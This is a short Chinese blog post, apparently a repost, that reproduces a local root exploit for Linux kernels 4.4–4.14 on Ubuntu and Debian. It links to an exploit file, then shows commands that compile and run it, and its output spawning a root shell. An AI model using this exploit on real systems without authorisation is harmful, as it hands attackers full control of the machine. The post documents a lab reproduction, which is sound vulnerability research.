码迷,mamicode.com
首页 > 系统相关 > 详细

新版本Ubuntu本地提权漏洞复现

时间:2018-03-17 16:48:03      阅读:294      评论:0      收藏:0      [点我收藏+]

标签:exp   修复   chm   ups   gen   its   idp   老版本   下载地址   

该漏洞在老版本中被修复了,但新的版本还存在漏洞

影响范围:Linux Kernel Version 4.14-4.4,Ubuntu/Debian发行版本

Exp下载地址:http://cyseclabs.com/exploits/upstream44.c

测试环境

sch01ar@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-87-generic #110-Ubuntu SMP Tue Jul 18 12:55:35 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

 开始测试

sch01ar@ubuntu:~$ gcc -o test upstream44.c 
sch01ar@ubuntu:~$ chmod -R 777 test
sch01ar@ubuntu:~$ ./test
task_struct = ffff8800338cd400
uidptr = ffff880007530904
spawning root shell
root@ubuntu:~# whoami
root

 复现成功

技术分享图片

 

新版本Ubuntu本地提权漏洞复现

标签:exp   修复   chm   ups   gen   its   idp   老版本   下载地址   

原文地址:https://www.cnblogs.com/sch01ar/p/8590641.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!